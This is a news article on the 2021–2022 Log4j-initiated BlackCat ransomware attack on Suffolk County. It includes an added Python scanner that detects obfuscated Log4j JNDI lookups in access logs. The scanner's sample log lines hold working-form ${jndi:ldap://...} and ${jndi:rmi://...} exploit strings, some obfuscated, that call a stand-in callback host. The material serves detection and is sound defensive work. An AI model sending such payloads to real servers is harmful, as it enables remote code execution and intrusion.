Steve Bellone: Suffolk cyberattack began in December 2021
A cyberattack on Suffolk County computer systems started in the clerk's office as early as December 2021, months earlier than previously disclosed, allowing hackers to launch a systemwide attack by Sept. 8, according to a county report released Wednesday.
The hackers took advantage of a then newly disclosed flaw in Log4j, a widely used open-source Java logging library (the county report refers to it as "a Log4J vulnerability"), to make their way into Suffolk's vast network and cripple key functions within one of the nation's largest municipalities.
At a news conference Wednesday, County Executive Steve Bellone also revealed that hackers demanded a $2.5 million ransom.
Bellone said the county did not pay, fearing the money would be used to commit crimes.
WHAT TO KNOW
- A cyberattack on Suffolk County systems started in the Clerk's Office as early as December 2021, months earlier than previously disclosed, Suffolk County Executive Steve Bellone said Wednesday in releasing a new forensic report.
- Bellone revealed that hackers demanded a $2.5 million ransom, which the county did not pay.
- The report provided new information about techniques the hackers used, including sophisticated "credential harvesting" and bitcoin mining tactics to creep into Suffolk computer systems.
County officials have said the hack used the BlackCat (also known as ALPHV) strain of ransomware.
Bellone released a summary of a report by digital forensic auditor Palo Alto Networks Inc., which the county attorney's office hired to analyze the ransomware attack.
The report provided a timeline of the spread of the hack from the clerk's office in December 2021 to county networks in August and September.
The last departments hacked were the health and sheriff's departments, also in September, the report said.
The report provided new information about the techniques hackers used, including sophisticated "credential harvesting" and bitcoin mining tactics to creep into Suffolk computer systems until they had secured full access.
The hackers acquired the necessary IT credentials of top administrators in the clerk's office before moving to the county's IT department in late August, Bellone said.
The Palo Alto Networks report said hackers used "discovery, enumeration, and privilege escalation tactics, techniques, and procedures and moved laterally through systems in the Suffolk County networks."
"The key finding of this forensic examination thus far is that the criminal actors first infiltrated the county clerk's IT environment one year ago this month," Bellone said.
"The criminal actors here sought a $2.5 million ransom," Bellone said.
Bellone said he decided "early on in this process" not to pay ransom.
"Payment is no guarantee that the criminal actors will honor their commitment or they won't come back later to extract additional demands," he said.
Officials shut down all county computer and email systems beginning Sept. 8 in an effort to contain the attack.
The shutdown caused delays in payments to county nonprofits and other vendors, and complicated title searches needed for closing on real estate transactions.
Suffolk has spent $3.4 million on restoring its systems and $2 million on the forensic investigation, Bellone said.
Restoration of Suffolk's network has taken an unusually long time, experts have told Newsday, although most county sites are back in operation, officials said.
Forensic analysts said hackers gained access to county networks through the clerk's office by exploiting "a Log4J vulnerability" on Dec. 19 and Dec. 20, 2021.
In January, the U.S. Federal Trade Commission said:
"Recently, a serious vulnerability in the popular Java logging package, Log4j was disclosed, posing a severe risk to millions … This vulnerability is being widely exploited by a growing set of attackers"
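The Log4j flaw the FTC is describing is triggered when attacker-controlled text containing a `${jndi:...}` lookup reaches a vulnerable logger, so the first thing a defender checks after an intrusion window like Dec. 19 to 20, 2021 is whether such strings appear in web and application logs. The scanner below is an added example written for this article, not code from the county report or from Palo Alto Networks. The log lines are constructed, the addresses are RFC 5737/5737-style documentation addresses, and the function names (`normalize`, `scan`) are the author's own. It undoes the common obfuscations attackers used to slip past naive `${jndi:` string matches (URL encoding, `${lower:j}`, `${upper:n}`, `${::-d}` and `${env:X:-i}` default-value tricks) and then extracts the callback host, which is what you would block and hunt for across the rest of the network.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines for this example (not real traffic).
# 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges (RFC 5737).
SAMPLE_LOGS = [
    '203.0.113.5 - - [19/Dec/2021:02:14:07 -0500] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [19/Dec/2021:02:14:09 -0500] "GET / HTTP/1.1" 200 5120 "-" "${jndi:ldap://198.51.100.23:1389/a}"',
    '203.0.113.9 - - [19/Dec/2021:02:15:31 -0500] "GET /login?user=%24%7Bjndi%3Armi%3A%2F%2F198.51.100.23%3A1099%2Fx%7D HTTP/1.1" 302 0 "-" "curl/7.79"',
    '203.0.113.11 - - [20/Dec/2021:04:01:55 -0500] "GET / HTTP/1.1" 200 5120 "-" "${${lower:j}${upper:n}${::-d}${env:NOPE:-i}:${lower:L}dap://198.51.100.23:1389/o}"',
    '203.0.113.12 - - [20/Dec/2021:04:03:02 -0500] "GET /docs?q=${date:yyyy} HTTP/1.1" 200 800 "-" "Mozilla/5.0"',
]

# Matches an innermost ${...} lookup, i.e. one with no nested ${ } inside it.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")

# After normalization the JNDI lookup is literal; Log4j lowercases the lookup
# prefix, so ${JNDI:...} works too and the match must be case-insensitive.
JNDI_LOOKUP = re.compile(r"\$\{jndi:", re.IGNORECASE)
CALLBACK = re.compile(r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^/}\s]+)", re.IGNORECASE)


def _resolve(m: re.Match) -> str:
    """Evaluate one innermost lookup the way Log4j's Interpolator would,
    for the lookups attackers use to hide the string 'jndi'."""
    body = m.group(1)
    if body.lower().startswith("jndi:"):
        return m.group(0)          # keep the payload itself intact
    if ":-" in body:               # ${anything:-X} and ${::-X} evaluate to X
        return body.split(":-", 1)[1]
    kind, sep, arg = body.partition(":")
    if sep and kind.lower() == "lower":
        return arg.lower()
    if sep and kind.lower() == "upper":
        return arg.upper()
    return m.group(0)              # unknown lookup (date, sys, ...): leave as-is


def normalize(text: str, max_rounds: int = 20) -> str:
    """URL-decode, then repeatedly collapse innermost obfuscation lookups
    until the string stops changing (bounded so a crafted line cannot spin)."""
    text = unquote(text)
    for _ in range(max_rounds):
        new = INNERMOST.sub(_resolve, text)
        if new == text:
            break
        text = new
    return text


def is_jndi_lookup(text: str) -> bool:
    """True if the line carries a JNDI lookup after de-obfuscation."""
    return JNDI_LOOKUP.search(normalize(text)) is not None


def scan(lines):
    """Return one record per suspicious line: its 1-based number, the JNDI
    scheme (ldap, rmi, dns, ...) and the callback host:port to block/hunt."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalize(line)
        if not JNDI_LOOKUP.search(norm):
            continue
        m = CALLBACK.search(norm)
        hits.append({
            "line": n,
            "scheme": m.group("scheme").lower() if m else None,
            "host": m.group("host") if m else None,
        })
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print(f"line {hit['line']}: jndi lookup via {hit['scheme']} -> {hit['host']}")
```

Note what the benign `${date:yyyy}` line on line 5 shows: grepping raw logs for `${` alone produces noise, while grepping for the literal `${jndi:` misses lines 3 and 4 entirely. Hunting on the extracted callback host is the useful next step, because the same host typically reappears in DNS, proxy and firewall logs from every machine the attacker touched afterwards.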
Hackers installed "cryptocurrency mining software on multiple" servers in the Suffolk clerk's office in January, the Palo Alto report said.
In March, hackers "continued to bypass network security and install remote monitoring and management tools as they began harvesting" user credentials of officials in the clerk's office.
Bellone criticized the clerk's office for its response to the attack.
He said Judith A. Pascale, a Republican, should not have trusted her office's IT director, who he said "seriously misled her."
Bellone said the individual acted in an "incredibly nonchalant manner."
"She trusted someone who in the end was not deserving of that trust," Bellone said. The clerk's IT department for many years has operated independently of the county's IT department.
County IT officials "had no eyes on, and no ability to monitor the clerk IT environment," he said.
Bellone, a Democrat, said Wednesday he had placed the clerk's IT director on administrative leave.
Bellone did not identify the IT chief, but Pascale and a county official confirmed the official placed on leave was Peter Schlussler.
Schlussler defended his performance in an email to Newsday.
"No one is perfect with decision making in the highly complex technological world. I included … ," Schlussler wrote.
"I do know I did my absolute best by trying to bring awareness to the cyber issues that me and my team witnessed over the course of the year," Schlussler said.
"Our office attempted to purchase a more robust firewall in June to offer better protection, however that was not allowed to be pushed forward," he said.
Schlussler said, "retribution was to be expected and I stand by what is depicted clearly in the emails."
Documents obtained by Newsday have revealed a continuing conflict between Pascale’s office and the county Information Technology Department as clerk’s officials sought what they said was more advanced protection for their computer systems.
Pascale’s office said it wanted a more expensive hardware solution for the firewall to identify and ward off cyberattacks before they could enter county networks, emails obtained by Newsday show.
The county government's solution was a "virtualized" firewall, which it said would provide the same level of protection while saving taxpayers money.
Pascale declined to comment on Bellone's remarks Wednesday.
Bellone said discovery of an unauthorized bitcoin operation in September 2021 may have led to delays in implementing a $1.4 million security upgrade in the clerk's office, approved by the county in September 2019.
Last year, Suffolk police charged IT supervisor Christopher Naples, of Mattituck, with third-degree grand larceny, public corruption, computer trespassing and official misconduct for allegedly running a cryptocurrency mining operation out of the county clerk’s Riverhead office.
Naples has pleaded not guilty. The case is pending in Southampton Town Court.
"The most obvious explanation, if you're Chris Naples, the architect of the first IT environment, running an illegal bitcoin mining operation, you're not going to want outside vendors and internal IT folks moving things around, in that environment," Bellone said.
A spokeswoman for Suffolk County District Attorney Ray Tierney said the office was working with the FBI on the criminal investigation into the cyberattack, but would not comment on pending charges.
With Mark Harrington
TIMELINE
Dec. 19 to Dec. 20, 2021: Hackers gain access to the County Clerk's Office by exploiting a vulnerability in the Log4j logging library.
January 2022: Hackers install bitcoin mining software in clerk office servers to establish a "command and control connection" within the clerk's "compromised IT environment," Bellone said.
March: Hackers install remote monitoring and management tools and harvest credentials of officials in the clerk's office.
Aug. 18: Hackers attempt to identify members of a highly privileged administrators group in county government.
Aug. 20-21: County systems are compromised via malware run from the clerk's office. Hackers begin harvesting the credentials of county administrators.
Sept. 8: County announces hack into computer networks: All websites, servers, networks taken offline.
Source: Suffolk County Executive